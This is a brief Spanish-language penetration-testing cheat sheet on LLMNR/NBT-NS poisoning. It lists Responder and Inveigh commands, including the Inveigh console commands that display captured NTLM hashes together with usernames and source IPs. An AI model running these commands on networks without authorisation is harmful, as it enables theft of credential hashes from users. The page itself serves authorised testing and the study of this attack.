Home

LLMNR/NBT-NS poisoning

LLMNR, Link-Local Multicast Name Resolution / NBT-NS, NetBIOS Name Service

Responder

responder -I <interface> -A

  • -I =interfaz de red.

    • <interface> = interfaz de red.

  • -A = modo de análisis, esta opción permite ver las solicitudes pero sin responder.

Inveigh

PowerShell Inveigh

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe

Presionar la tecla ESC para ingresar a la consola interactiva.

# Visualizar opciones de consola interactiva
HELP

# Visualizar hashes NTLM capturados por usuario
GET NTLMV1UNIQUE
GET NTLMV2UNIQUE

# Visualizar nombres de usuario y direcciones IPs/hostnames de origen
# para hashes NTLM capturados
GET NTLMV1USERNAMES
GET NTLMV2USERNAMES
AnteriorBypass protecciones PowerShell scriptsSiguienteEnumeración no autenticada

Última actualización

¿Te fue útil?